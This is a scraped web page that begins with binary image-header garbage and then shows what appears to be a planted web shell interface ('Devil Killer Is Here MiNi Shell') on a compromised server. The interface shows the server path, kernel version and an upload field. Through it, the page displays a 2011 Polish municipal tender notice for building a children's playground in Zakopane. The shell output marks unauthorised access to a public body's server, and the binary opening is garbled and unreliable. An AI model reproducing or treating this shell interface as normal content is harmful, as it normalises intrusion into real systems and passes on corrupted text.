JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111020/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111020/344490-N-2011.html

<p class="kh_header"><b>Zakopane: Zaprojektowanie i wykonanie robót budowlanych i urządzenia zieleni wraz z wykonaniem dostawą i montażem wyposażenia dla zadania nr 138/2011 Wykonanie placu zabaw - Centrum Aktywności Dzieci i Młodzieży  położonego na Równi Krupowej w Zakopanem</b><br>
<b>Numer ogłoszenia: 344490 - 2011; data zamieszczenia: 20.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie i wykonanie robót budowlanych i urządzenia zieleni wraz z wykonaniem dostawą i montażem wyposażenia dla zadania nr 138/2011 Wykonanie placu zabaw - Centrum Aktywności Dzieci i Młodzieży  położonego na Równi Krupowej w Zakopanem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zaprojektowanie i wykonanie robót budowlanych i urządzenia zieleni wraz z wykonaniem dostawą i montażem wyposażenia dla zadania nr 138/2011 Wykonanie placu zabaw - Centrum Aktywności Dzieci i Młodzieży  położonego na Równi Krupowej w Zakopanem

Etapowanie zamówienia: 

	Etap A

Wykonanie, co najmniej 2 koncepcji architektoniczno budowlanych placu zabaw 
w oparciu o PFU,
Wykonanie makiet do koncepcji wybranej prze Zamawiającego,
Wykonanie projektu budowlanego na podstawie wybranej przez Zamawiającego koncepcji, 
Przygotowanie kompletnego wniosku i uzyskanie w imieniu inwestora pozwolenia 
na budowę,  

 Etap B
Wykonanie projektów wykonawczych stanowiących uzupełnienie i uszczegółowienie projektu budowlanego w oparciu o PFU wraz z załącznikami,
	Wykonanie Specyfikacji Technicznych Wykonania i Odbioru Robót.

Etap C
Wykonanie robót budowlanych na podstawie sporządzonej dokumentacji projektowej 
Dostawa i montaż wyposażenia objętego dokumentacja projektową posiadającego wszystkie wymagane prawem atesty i dopuszczenia do eksploatacji,
	Urządzenie zieleni na podstawie dokumentacji projektowej,
Sporządzenie dokumentacji powykonawczej i przygotowanie kompletu materiałów
 do uzyskania zgłoszenia przystąpienia do użytkowania lub pozwolenia 
na użytkowanie obiektu. 
Zapewnienie eksploatacji, serwisowania urządzeń i utrzymania zieleni przez okres, co najmniej 36 m-cy od daty oddania obiektów do użytkowania.

Przedmiot zamówienia podany w p. 2 szczegółowo opisuje:

Program Funkcjonalno Użytkowy ( PFU).
Wytyczne konserwatorskie


Zakres prac projektowych ujętych w etapie A obejmuje w szczególności:

Pozyskanie map w tym mapy do celów projektowych z wszystkimi niezbędnymi 
do celów projektowych naniesieniami, w tym geodezyjnym naniesieniu graficznych elementów obowiązującego Planu Zagospodarowania Przestrzennego,
Pozyskanie aktualnych na dzień składania wniosku o pozwolenie na budowę wypisów z rejestru gruntów,
	Pozyskanie geotechnicznych warunków posadowienia obiektów i ustalenie kategorii geotechnicznych projektowanych obiektów,  
Wykonanie, co najmniej 2 koncepcji architektoniczno budowlanych placu zabaw 
w oparciu o PFU,
	Wykonanie makiet do koncepcji wybranej przez Zamawiającego w skali nie mniejszej niż 1;25
Wykonanie projektu budowlanego na podstawie wybranej przez Zamawiającego koncepcji, 
Uzyskanie w imieniu inwestora wszelkich warunków zasilania i odbioru mediów,  zgód, zezwoleń od zarządców sieci, dróg, konserwatora zabytków, w tym koniecznych zezwoleń na wycinkę drzew i krzewów,
Przygotowanie kompletnego wniosku i uzyskanie w imieniu inwestora pozwolenia 
na budowę,  

Zakres prac projektowych ujętych w etapie B obejmuje w szczególności:

Wykonanie projektów wykonawczych stanowiących uzupełnienie i uszczegółowienie projektów budowlanych.
Wykonanie specyfikacji Technicznych Wykonania i Odbioru Robót (STWiOR) 
dla wszystkich robót objętych projektem budowlanym i wykonawczym, z podaniem standardu, rodzaju, producenta materiału lub urządzenia, które Wykonawca ma zamiar zastosować przy realizacji zamówienia, 
Uzyskanie w imieniu inwestora wszelkich zgód, zezwoleń od zarządców sieci, dróg, konserwatora zabytków w zakresie niezbędnym do rozpoczęcia robót, w tym koniecznych zezwoleń na wycinkę drzew i krzewów nieujętych na etapie sporządzania projektu budowlanego koniecznych do przystąpienia do realizacji zadania,
Sporządzenie wszelkich niezbędnych dokumentacji oraz projektów wynikających 
z p. 6.5. 
Przedłożenie inspektorowi nadzoru dokumentów materiałów, które Wykonawca zamierza zastosować przy realizacji zamówienia i uzyskanie akceptacji Inspektora Nadzoru dla ich zastosowania, w tym zgodności z  grupa norm  PN-EN 1176/PN-EN 1177 
Zakres prac i robót ujętych w etapie C obejmuje w szczególności:

Budowę ogrodzenia z bramami i furtka 
Budowę linii kablowych instalacji  niskiego napięcia. 
Budowę oświetlenia. 
Budowę instalacji i przyłączy: wody, kanalizacji sanitarnej, deszczowej oraz sieci kanalizacji deszczowej - w tym drenażu.
Wykonanie monitoringu placu z możliwością integracji z monitoringiem miejskim
Budowę toalet ogólnodostępnych ze szczególnym uwzględnieniem korzystania z nich przez dzieci i matki z dziećmi ( z  miejscem do przewijania), jak również osoby niepełnosprawne
Wykonanie, dostawę i montaż elementów małej architektury w tym: ławek parkowych, koszy na śmieci urządzeń zabawowych, posiadających wszelkie obowiązujące atesty i spełniających Polskie Normy w tym z grupy  PN-EN 1176 i PN-EN 1177.
Urządzenie zieleni łącznie z zakupem i dostawą roślin łącznie z ich pielęgnacją 
i utrzymaniem przez okres, co najmniej 36 miesięcy
Budowę komunikacji i elementów komunikacji  wewnętrznej.
Budowę stref  bezpieczeństwa z nawierzchnią bezpieczną dla urządzeń zabawowych
Ustanowienie kierownika budowy odpowiadającego za całość budowy objętej projektem budowlanym i pozwoleniem Starosty Tatrzańskiego.
Ustanowienie kierowników robót budowlanych, do których kierowania niezbędne jest posiadanie uprawnień innych niż posiada kierownik budowy. 
Zapewnienie geodezyjnej obsługi inwestycji w tym wytyczenia obiektów Dokumentacji powykonawczej, o której mowa w art. 57 Prawa Budowlanego wraz 
z inwentaryzacją geodezyjna powykonawczą opatrzoną klauzulą przyjęcia 
do Państwowego Zasobu Geodezyjnego oraz adnotacja sporządzającego geodety oceniająca zgodność z zatwierdzonym Projektem Zagospodarowania w tym rzędnymi poziomu parteru obiektów kubaturowych.
Przedstawienia certyfikatów wykonania placu i urządzeń zabawowych  z nim związanych zgodnie z grupa norm ,normą PN-EN 1176 i PN-EN 1177, wydanych przez upoważnione do ich wydania jednostki np. UDT.
Instrukcji obsługi urządzeń i regulaminu korzystania z placu zabaw również w formie tablic informacyjnych umieszonych na obiekcie.


Udzielą, co najmniej 36-cio miesięcznej gwarancji na wykonane roboty budowlane, elementy małej architektury i zieleń, objęte przedmiotowym zamówieniem.
Zapewnią w ramach złożonej  oferty eksploatację i serwisowanie w tym przeglądy urządzeń zabawowych oraz utrzymanie zieleni przez okres co najmniej 36 miesięcy od daty dopuszczenia obiektu do użytkowania

Zamawiający dopuszcza wynikające z przyjętej technologii zmiany w projekcie wykonawczym w stosunku do istniejącego projektu budowlanego niepowodujące istotnych odstępstw, o których mowa a w art. 36 a ust.5 Prawa Budowlanego. Zmiany wymagają akceptacji Zamawiającego oraz autorów projektu budowlanego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.10-5, 45.11.27.23-9, 45.11.27.20-8, 45.20.00.00-9, 45.23.32.50-6, 43.32.50.00-7, 71.30.00.00-1, 71.40.00.00-2, 71.42.00.00-8, 71.54.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 11.1	Każdy wykonawca jest zobowiązany wnieść wadium przetargowe    
    w wysokości  10.000,00     zł  ( słownie:   dziesięć  tysięcy  złotych)
11.2	Wadium może być wnoszone w jednej lub w kilku  następujących formach: 
       11.2.1. pieniądzu;
       11.2.2.poręczeniach bankowych lub poręczeniach spółdzielczej kasy 
                  oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze 
                  poręczeniem pieniężnym;
      11.2.3. poręczeniach bankowych;
      11.2.4. gwarancjach bankowych;
      11.2.5. gwarancjach ubezpieczeniowych;
      11.2.6. poręczeniach udzielanych przez podmioty, o których mowa w art. 6 lit. b ust. 
                5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji   
                 Rozwoju Przedsiębiorczości ((Dz.U z 2007r. Nr 42 poz.275 z późn. zm.) 

11.3.	Wadium przetargowe w  pieniądzu należy wnieść  przelewem na konto Urzędu   
   Miasta Zakopane w PEKAO S.A. w Zakopanem nr: 85 1240 4748 1111 0000 4871 8666   
    Wadium powinno znajdować się na koncie zamawiającego najpóźniej   
    w terminie składania ofert tj. 21 listopada 2011 r. do godz.  12°°

11.4.Wadium wnoszone w pozostałych formach należy złożyć w postaci oryginału,   
        najpóźniej w terminie składania ofert tj.21 listopada 2011 r. do godz. 12°° w  Biurze    ds. zamówień publicznych pok. nr 8 (parter).
        
  11.4.1. UWAGA! Nie wolno oryginałów tych dokumentów wkładać do oferty.

  11.5.   Zwrot wadium  
         11.5.1. Zamawiający zwraca wadium  wszystkim wykonawcom niezwłocznie po 
                     wyborze oferty   najkorzystniejszej lub unieważnieniu postępowania, z 
                     wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza , z 
                     zastrzeżeniem ,że  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli 
                     wykonawca w odpowiedzi na  wezwanie, o którym mowa w art. 26 ust. 3ustawy       
                     nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1   
                     ustawy,  lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn 
                     nieleżących po jego stronie. 

      11.5.2. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy który 
                    wycofał ofertę przed upływem terminu składania ofert;
          11.5.3. Zamawiający żąda  ponownego wniesienia wadium przez wykonawcę którym 
                      zwrócono wadium na podstawie ust.1  jeżeli w wyniku  ostatecznego  
                       rozstrzygnięcia protestu jego oferta została  wybrana jako najkorzystniejsza.     
                       Wykonawca wnosi wadium  w terminie określonym przez Zamawiającego.
          11.5.4. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami   
                      wynikającymi z umowy rachunku bankowego, na którym było ono  
                       przechowywane, pomniejszone o koszty prowadzenia rachunku banko?wego   
                       oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany 
                       przez wykonawcę.
    
         11.5.5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
                      oferta została wybrana:
     11.5.5.1. odmówił podpisania umowy w sprawie zamówienia publicznego na 
                    warunkach określonych w ofercie;
     11.5.5.2. nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
              11.5.5.3. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe    
                             z przyczyn leżących po stronie</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne 
                     oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub 
                  nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.Warunek zostanie uznany za spełniony ,jeżeli  wykonawca wykaże , że w 
                        ciągu ostatnich 5 lat przed upływem terminu składania ofert  a jeżeli okres   
                        prowadzenia działalności jest krótszy w tym okresie wykonał  co najmniej.:

 - 2 projekty budowlane i wykonawcze obiektów odpowiadającym swoim  
                               rodzajem obiektom stanowiącym przedmiot zamówienia tj. wykonanie    
                               placu zabaw o pow. min 1000 m2. wraz z wyposażeniem i urządzeniem  
                               zieleni.

 -  2 roboty odpowiadającym swoim rodzajem przedmiotowi zamówienia 
                                   tj. placu  zabaw o pow. min 1000 m2 wraz  z wyposażeniem i 
                                   urządzeniem zieleni o wartości łącznej, co najmniej 300 000 PLN 
                                   każda.


Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia  
                       lub  nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone         
                       do  oferty .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne 
                   oświadczenie

Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia 
                          lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone  
                          do oferty .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  zostanie uznany za spełniony ,jeżeli  wykonawca wykaże  ,że zapewni  
                   wykonanie zamówienia przez : 
-osobę, posiadającą uprawnienia budowlane do projektowania bez 
                            ograniczeń lub odpowiadające wydane na podstawie wcześniejszych  
                           przepisów specjalności architektonicznej, należącą do Izby Architektów.  
                           Osoba ta we własnym zakresie zorganizuje i skoordynuje zespół  
                           zapewniający opracowanie projektów przez osoby posiadające uprawnienia  
                           budowlane do projektowania w specjalności wymaganych do  
                           zaprojektowania branż projektu, jeżeli do ich zaprojektowania nie posiada  
                           uprawnień.
- osobę, posiadającą uprawnienia budowlane do kierowania robotami    
                           w specjalności konstrukcyjno - budowlanej bez ograniczeń lub   
                           odpowiadającymi wydanymi na podstawie wcześniejszych przepisów   
                            należącą do właściwej Izby Inżynierów Budownictwa, 
Zapewnią kierowanie robotami budowlanymi i urządzeniem zieleni, 
                           w przypadku, gdy kierownik budowy nie posiada takich uprawnień przez   
                           osoby, posiadające uprawnienia budowlane do kierowania robotami w  
                           specjalności instalacyjnej lub odpowiadającymi wydanymi na podstawie        
                           wcześniejszych przepisów należące do właściwej Izby Inżynierów   
                           Budownictwa, uprawnienia do urządzania zieleni oraz uprawnienia do  
                           kierowania robotami budowlanymi przy zabytkach nieruchomych  
                           spełniające warunki Rozporządzenia Ministra Kultury z dnia 9 czerwca  
                           2004r. w sprawie prowadzenia prac konserwatorskich, restauratorskich,  
                           robót budowlanych, badań konserwatorskich i architektonicznych, a także  
                           innych działań przy zabytku wpisanym do rejestru zabytków oraz badań  
                           archeologicznych i poszukiwań ukrytych lub porzuconych zabytków  
                           ruchomych (Dz. U z 2004 r., nr 150 poz. 1579), 


Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia   
                           lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone  
                           do oferty .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca wykaże ,że  posiada  
                środki finansowe  lub zdolność kredytową  w wysokości nie mniejszej niż     
                250 .000,00 zł- ( słownie:  dwieście pięćdziesiąt tysięcy  złotych )

Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia 
                          lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone  
                         do oferty .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
